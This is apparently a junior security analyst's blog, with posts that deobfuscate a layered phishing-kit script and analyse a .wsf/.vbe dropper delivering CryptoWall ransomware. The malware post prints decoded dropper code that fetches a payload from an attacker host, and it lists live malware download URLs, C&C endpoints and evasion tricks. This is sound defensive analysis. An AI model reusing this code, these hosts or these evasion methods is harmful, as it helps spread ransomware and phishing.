Phishing kits are boring most of the time, and you cant fight stupid (users).
I have recently came across an interesting kit, thumbs up for the threat actor, if he only worked a bit on his e-mail that he sends to victims (cant share), and it could be much deadlier.
So how this works?
1) Threat actor sends bunch of emails to a big victim list, the email message is some "blabla please sign to DocuSign to view the document in google docs" etc...
Sometime the emails are in html formats so they change the <a href > tag so it would look like legit link when you hover over it, but when you click it sends to a different url.
In this case the attacker chose to use url shortening:
ht=tp://www.bit.ly/1Q5RMSN
This url is pointing to:
hXXp://jqueryapi.info/?getsrc=ok&ref=&url=data%3Atext%2Fhtml%3Bbase64%2CPFNjcmlwdCBMYW5ndWFnZT0nSmF2YXNjcmlwdCc%2BDQoNCmRvY3 ....
full url: http://pastebin.com/rPZ7Dzrt
JQuery you say? The data is base64 blob, if we copy the blob (starting with "PFN") to some decoder we will get some nice clear text like:
<Script Language='Javascript'>
document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67
full: http://pastebin.com/dbv30qp2
Bang, 2nd layer of obfuscation, a JS with unescape obfuscation.
After decoding that we get another clear text, with yet another script!
<script language="javascript" type="text/javascript">var l1l='=oQKpkyJ8dCK0lGbwNnLnkXYsB3cpRmMywHf
full: http://pastebin.com/Vu2mAzV6
Damn son, 3rd layer of obfuscation, with another JS code, containing eval and some custom encryption. Even if we beautify the code it still look nasty.
I don’t really care going all the code with debugger to see exactly what happens, and probably you as well, so lets create an html file with the JS code and change the "eval(_1OI(_1I1(l1l)));" function in the end to "window.alert(_1OI(_1I1(l1l)));"
This simply will print us the evaluated code in an alert box, and if we will open it in a browser we will get the result:
"eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+"
w00t? another eval with custom encryption? 4 obfuscation layers for phishing? dude, you are crazy!
Ok, lets do the trick of window.alert instead of eval again?
Unfortunately the new code is too long for the alert box so it is cut before the end and trying that trick will result an empty page.
So lets go back and change the "eval/window.alert" to "document.write".
We know it is safe to do because we saw in the first trick the output is eval, and not <script>.
full: http://pastebin.com/L3PrgjWK
Ok, now i got stuck for a while, because i tried to apply the previous methods and they didn’t work, while adding document.write to the eval would show the phishing page.
After some googling i found http://handlers.sans.org/dwesemann/decode/
Used #2 - The Tom Liston Method, i got in the result another eval that looked very familiar to the one i had, i thought maybe i did something wrong, so i pasted the output in my html page to show me code after "eval".
Once again the result was with "eval", this time i noticed there is a slight change to the code, so i continued changing my html with the output of showme().
After 3 or 4 times i ran this i got a new code in the text area:
"var _escape='%3C%21DOCTYPE%20html%3E%0A%3Chtml%20lang%3D%22en%22%3E%0A%20%20%3Chead%3E%0A "
Another obfuscation!!!
full: http://pastebin.com/nHXBj5bB
Ok, this finally looks like the end of the saga, in the end there is a check if the user agent is Rambler or Yandex, Russian sites, guess the attacker is Russian and doesn’t want to phish his own people, another check for "Yaho" , guess this is a typo, and finally unescape the "var _escape" and write the pure html to the page.
So here is the final result: http://pastebin.com/xDLTHPTN
this was actually picked up by my ISP content filtering, so this 7 layer fileless obfuscation actually works quite well to bypass many filters.
TL:DR
block hXXp://www.ndsnotebook.com.br/wp-includes/css/themes/
Thursday, December 17, 2015
Wednesday, December 16, 2015
.wsf malware?
So i've stumbled upon something "new", a .wsf file , this is basically a fancy .vbs file.
URL to sample (as sent in the mail from threat actor, the usual invoice bull crap)
hXXps://www.mediafire.com/download/q1yqupocyigke3k/INVOICE_8329380DF.doc_.wsf
mirror: https://malwr.com/analysis/YWY2NjY3ZDhlYzUwNGI4ZGE4OTZhNzE4NjFiNDcwYTY/
Now if we open that file we will see in the first line and few hundreds following a gibberish text like this:
URL to sample (as sent in the mail from threat actor, the usual invoice bull crap)
hXXps://www.mediafire.com/download/q1yqupocyigke3k/INVOICE_8329380DF.doc_.wsf
mirror: https://malwr.com/analysis/YWY2NjY3ZDhlYzUwNGI4ZGE4OTZhNzE4NjFiNDcwYTY/
MD5 | 70ca3b4d70f564348e2d3ba903e78b5e |
---|---|
SHA1 | e5023bd075a47b6de994d4ea7c757fa7ce7fcbb4 |
SHA256 | 9c007e99407b961ad34baa86b017867f75628f28b642e37ea1635ee5b1aa83e6 |
"/*Gelder Sunbelt Discontent Hookey Chared Precipiced
Infarct Hydrostatics ..."
This is basically one big comment that is meant for evasion from AV/analysts/ninjas...
After few more lines you will find the end of the comment, start of the .wsf file (job), and a new comment...
"Torquing*/
<job>
/*Teleph"
More blablabla and we will find the most interesting part:
"Eviscerates Franking Anesthesiology Shamefaced
Streetlight Floorings*/
#@~^Wl8AAA==&JytksAmAhmU$kL?kxL!(ybn1.m$4[:wXVmp:Ph\X}hUd} s-3Hs\-"
The string "#@~^" indicates that this is encrypted vbs (.vbe), i have encountered such before, but i have never actually could find a good working method to decode them, up until now.
A user named "Hackoo" at stack overflow posted this nice code that does the job perfectly
http://stackoverflow.com/questions/32882622/convert-vbs-encrypted-script-to-string
After we decode the .vbe we get some more gibberish, like this:
"if (!nAkTeFqOrAeRcwmTaBmAhangdYaVmLhHuExSkLgEedqGrGwSuCnHatiScgug.fileexists(aIcNlbnOkdsItSgUnTihbIfcfBrGaakHgIfCiWwWdVfamwciqG+'\\qAcTyGsrkHlBagwS.doc')) { //lPwCyOgfdAoXiflWaqeluLlDcGagxtrKaBbttMsIciwQgslGgXctbAlWmPmcmGfyyXsSbAnGavtDnEqTrEhyxMgZbBlEoQmLpBeShWuRhYkSbxxIuqpTrkmquSfAiRyDgibAhgrGgnmBwyxGuHkAaTbskrgOfUmFwMtmyGvIeHeQdVlytgqOrFuAfOpgrMiQoEqPaWqTaGcaeLgFdGkLkWxYngvKlanwyKbKtkktyUtxeAkYgYyEwimTomlagTcCpUeRmpqlkcaWgChAqVgGuRdZsHhBoBhFyAbObDnGyGxGcUcB //agnXrHaNpCfKwOahkLiZnPmAufcPuAhbfbwnqPlLoOfpqGgDpRigbUpGdwmamBvazCgrzNgGhSwAagxKqvcucfxUdIoFsSvMdHdRmhiPpOkPcPrZsOtBqAqPpWhueVgUhMiWwOpLvUgWfEaKyigKwCpGePwZsMcZtupGvCzHuphGaElAnQemtgvZdMfurRaMwLhohRydbEkurKrGrVaUqdbVgtaKcFaymexPkRnclroHgLzQvBfFqwdAfGwLgZrDbAswtDlgrHegaZwkhUawdMmZrLhUhldoyQmRgAtEyRhSoVvFhqbWqMkcvEexzEsIcEhBeGtOflkFmdsdaPzYlbhTfWhkfRgQ //gWytuPsKlhaZqAiwvLrCwYnAmFuOpGnihKdDlgcCrXtNuXzFdBbiaDtQgVfVvSgtqVrNdruFgOwQdWngpAaAqaeGgZvftLyzlGhDoYbdoZescppVoD //hPpAwBiZmHbEynvxighIdqgObGvOhXcXaDpUgdyWxokZrFxBoXpFkWxupOzGrCpVgzoCgZkidCqVoGxFoGrUqFaqfTuFcOgAoFafkzyBlofKtBxogCgIyOsGrWtBiOfnpYlOcQwEyRvlyMsvbYnGdQqDhrxVfCvOzQ //aEsHkVkRxDnVgRiqpWpBxevQtAcXaGyzmGaOiAytybmklWlGgExmyHwDkAqvdPlYyunTdBfWzruVhkxGalrVxOlMtbthvRkFmQfPmXaVkApHpQgMpygybUfYdgbOgWmAivnXuefBaTslahgYgGgHyZimuasTmasGkPlBgRqLuAnToZfGgtaSsSnakeovlOaxwqdsaPgSpRdtsIaSwyxGltfRbezSrfdCfgqDaZnYbakyaAgEbCbItruGgMdBdYsGxQfYsTncgPdCudaUoatVbFuQiYmAtAcYrNaNcblRdGwBlaoTqRiVgIcIvXfWoDfHoQvBoXdOpXiWcAuSrPqewNeUbEgDgntKfdoceyobqDaSpSuEaDpDwKylvEqCpWvcdTnYncyevCpGaHiTfBsYkGyBrfpIbDtIhFaBbYmYeCwGhGcHssgYipvKsMvTaXttgynQosgCgU var bQgadMaXdIiIfPuOyCpZfZxocXlLmZslmtgSbV=WScript.CreateObject('MSXML2.XMLHTTP'); bQgadMaXdIiIfPuOyCpZfZxocXlLmZslmtgSbV.open('PUT','http://aolmessenger.su/update/check.php',false); bQgadMaXdIiIfPuOyCpZfZxocXlLmZslmtgSbV.send();"
Again, the threat actor using // comments to make the untrained eye to fail to find "http://aolmessenger.su/update/check.php"
So after removing the comments from the decrypted .vbe we end up with an easy .vbs file that connects to:
http://aolmessenger.su/update/check.php
and
http://aolmessenger.su/update/info.doc
You think the threat actor finished with trying to fool us? Think again, here comes the most interesting stuff:
In sandbox analysis the .wsf file drops and .com (PE) and .doc file.
You can see that in the decoded .vbe strings:
"zHqnrMwaqnaHscsuvNsZyGkSetgTsMsywT.Exec(aIcNlbnOkdsItSgUnTihbIfcfBrGaakHgIfCiWwWdVfamwciqG + '\\uarQrKkeoPnqnOgAgHfZ.com');
gUntydcFbSphhglgyWeNgDkZgYuNlBoDxm.SaveToFile(aIcNlbnOkdsItSgUnTihbIfcfBrGaakHgIfCiWwWdVfamwciqG + '\\qAcTyGsrkHlBagwS.doc');"
The .doc file is clean and it is a decoy to the .wsf file, the file that is saved is actually named "INVOICE_8329380DF.doc .wsf"
So even if you have extensions enabled in view, all the blank spaces move the extension so you barely see it, and the user thinks that he opened a .doc file, so he expects a .doc file to be opened, which actually happens with this dummy file.
doc md5:
03dc2be6251417386887ed968482deb2
Now, check.php with PUT request in the .vbe caused to download .com file
But if you try to go to that URL yourself you will get this little fella:
x-mas.jpg - md5: b2d625408dfc0347e8202c9ccd36adbb
This nice x-mass greeting is in Russian (Хуй? пизда? джигурда!)
And the two words are common curse words, the 3rd one stumbled me and i have found the explanation for this phrase: https://www.youtube.com/watch?v=foodjSqrAh0
If you don’t know Russian that put the English captions, they are hilarious!
So it looks like yet another method of keeping ninjas out, but i have the .com file from the sandbox analysis, maybe if i tried getting it with put like the .vbs or changing user agent i would get it as well.
So what is this final payload? Oh this is just cryptowall (4?)
md5: 908185de411e7e513535599540932caa
How do i know it is cryptowall? If your sandbox is good, the malware will decrypt files, delete shadow volume, and will create help_decrypt files that say welcome to the cryptowall family.
Every time i ran it i got different C&C, here are some:
Every time i ran it i got different C&C, here are some:
elautech.com/dHgZQD.php?x=98xxxj2adv49w4q (212.172.221.11)
newtone.pl/dJE2Ok.php?g=98xxxj2adv49w4q (91.232.4.242)
shadowdent.ro/KqSF6e.php?w=8mbts9497st8rg (93.115.52.160)
hoffice.nu/t6mWjF.php?y=e08xpt0rx54jh (188.40.99.15)
frenchies.eu/ncgkiT.php?o=2qs3f6poq2h (62.210.178.117)
new-media-consulting.org/8rm6Sc.php?t=55oerfob715 (81.169.145.164)
enguzelilahiler.com/jwtfq9.php?f=yes6nej17cvj0r (178.32.234.11)
newtone.pl/dJE2Ok.php?g=98xxxj2adv49w4q (91.232.4.242)
shadowdent.ro/KqSF6e.php?w=8mbts9497st8rg (93.115.52.160)
hoffice.nu/t6mWjF.php?y=e08xpt0rx54jh (188.40.99.15)
frenchies.eu/ncgkiT.php?o=2qs3f6poq2h (62.210.178.117)
new-media-consulting.org/8rm6Sc.php?t=55oerfob715 (81.169.145.164)
enguzelilahiler.com/jwtfq9.php?f=yes6nej17cvj0r (178.32.234.11)
From quick search it looks like the C&C are compromised servers
The dropped files domain (aolmessenger.su) looks fairly new, and if you wasn’t sure the threat is Russian here is another nail to the coffin:
Looks like the actor wanted to verify his new domain is reachable
and some registrant info:
Thursday, December 3, 2015
Intro
Hi all, and welcome to my blog.
This is an introduction post to my blog, which will have posts about the adventures of a junior security analyst, the opinions and thoughts expressed here are my own and all that bla bla...
In our area of cyber security that threats always change, i have found that personal blog posts are the best source for information, i have learned myself a lot from such posts, and i will constantly add blogs to my reading list, as soon as i figure out how it works.
I thought about opening my own blog for a while now, to share back, but i haven't got anything interesting to write about, up until recently.
So this blog should have posts in an easy and detailed way so other people could use the info to learn new things as i did.
So stay tuned for the soon to be first detailed post about a threat i have found.
This is an introduction post to my blog, which will have posts about the adventures of a junior security analyst, the opinions and thoughts expressed here are my own and all that bla bla...
In our area of cyber security that threats always change, i have found that personal blog posts are the best source for information, i have learned myself a lot from such posts, and i will constantly add blogs to my reading list, as soon as i figure out how it works.
I thought about opening my own blog for a while now, to share back, but i haven't got anything interesting to write about, up until recently.
So this blog should have posts in an easy and detailed way so other people could use the info to learn new things as i did.
So stay tuned for the soon to be first detailed post about a threat i have found.
Subscribe to:
Posts (Atom)